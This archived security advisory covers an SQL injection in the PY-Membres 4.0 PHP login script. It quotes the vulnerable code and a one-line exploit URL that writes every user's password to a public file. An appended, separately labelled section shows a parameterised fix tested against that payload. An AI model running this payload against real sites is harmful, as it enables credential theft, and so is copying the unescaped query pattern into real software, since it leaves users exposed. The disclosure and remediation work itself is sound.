Vulnwatch mailing list archives
PY-Membres 4.0 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 06 Apr 2003 20:16:25 +0200
Information :
°°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
login.php :
------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");
est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
// $login is placed into the query string unescaped (the injection point)
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
$req = mysql_query($sql) or die('Erreur SQL !<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
if($data['passwd'] != $pass) {
    echo "<p>Mauvais login / password. Merci de recommencer</p>";
    mysql_close();
    exit;
}
else {
    $ploginy=$login;
    session_register('ploginy');
    $ip=$REMOTE_ADDR;
    $host=gethostbyaddr($ip);
    $log=date("d/m/Y à H\hi | ");
    $log.=$ip." | ".$host;
    $action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE login='$ploginy'") or die (mysql_error()) ;
    mysql_close();
    Header("Location: membre.php");
}
?>
------------------------------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

will save all users' passwords into the file http://[target]/file.txt.

Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.info.

More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PY-Membres4.0.txt

frog-m@n
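Added example, not part of the original advisory and not the phpsecure.info patch: one way to write the login.php lookup so that the login value is bound as data and cannot change the SQL statement. The table name members, the sample row, and the function name check_login are assumptions, and an in-memory SQLite database stands in for MySQL so the block runs offline.

```php
<?php
// Added example: hardened form of the login.php credential check.
// Assumptions (not from the advisory): table "members", the sample row,
// the function name check_login(); SQLite in memory replaces MySQL.

function check_login(PDO $db, $login, $pass)
{
    // Reject arrays (login[]=x) and empty values before touching the database.
    if (!is_string($login) || !is_string($pass) || $login === '' || $pass === '') {
        return false;
    }
    // Bound parameter: quotes inside $login never reach the SQL parser.
    $stmt = $db->prepare('SELECT passwd FROM members WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // unknown login: fail closed
    }
    // Swapped-in hardening: verify against a stored hash. The original
    // compares the stored value directly with the submitted password.
    return password_verify($pass, $row['passwd']);
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
// Raise exceptions instead of echoing the query and driver error to the client.
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (login TEXT PRIMARY KEY, passwd TEXT, lastlog TEXT)');
$ins = $db->prepare('INSERT INTO members (login, passwd) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// In login.php the two values would be read from $_POST['login'] and
// $_POST['pass'] rather than from register_globals variables.
$cases = [
    ['alice', 'correct horse'],   // valid credentials
    ['alice', 'wrong'],           // wrong password
    ["' OR ISNULL(NULL) INTO OUTFILE '/path/to/site/file.txt", '1'], // login value from the advisory
];
foreach ($cases as [$login, $pass]) {
    $result = check_login($db, $login, $pass) ? 'accepted' : 'rejected';
    printf("%-58s => %s\n", $login, $result);
}
```

Only the first case is accepted; the login value from the advisory is looked up as a literal user name and matches no row.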